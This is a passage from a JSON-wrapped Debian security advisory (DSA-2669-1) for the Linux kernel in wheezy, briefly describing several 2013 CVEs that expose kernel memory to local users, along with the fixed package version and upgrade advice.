sensitive kernel\n memory.\n\nCVE-2013-3228\n\n Mathias Krauss discovered an issue in the IrDA (infrared) subsystem\n support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3229\n\n Mathias Krauss discovered an issue in the IUCV support on s390 systems.\n Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3231\n\n Mathias Krauss discovered an issue in the ANSI/IEEE 802.2 LLC type 2\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3234\n\n Mathias Krauss discovered an issue in the Amateur Radio X.25 PLP (Rose)\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3235\n\n Mathias Krauss discovered an issue in the Transparent Inter Process\n Communication (TIPC) protocol support. Local users can gain access to\n sensitive kernel memory.\n\nCVE-2013-3301\n\n Namhyung Kim reported an issue in the tracing subsystem. A privileged\n local user could cause a denial of service (system crash). This\n vulnerabililty is not applicable to Debian systems by default.\n\nFor the stable distribution (wheezy), this problem has been fixed in version\n3.2.41-2+deb7u1.\n\nNote: Updates are currently available for the amd64, i386, ia64, s390, s390x\nand sparc architectures. Updates for the remaining architectures will be\nreleased as they become available.\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n Debian 7.0 (wheezy)\n user-mode-linux 3.2-2um-1+deb7u1\n\nWe recommend that you upgrade your linux and user-mode-linux packages.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or "leap-frog" fashion.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-05-16T02:56:25", "published": "2013-05-16T02:56:25", "id": "DEBIAN:DSA-2669-1:6658C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00077.html", "title": "[SECURITY] [DSA 2669-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
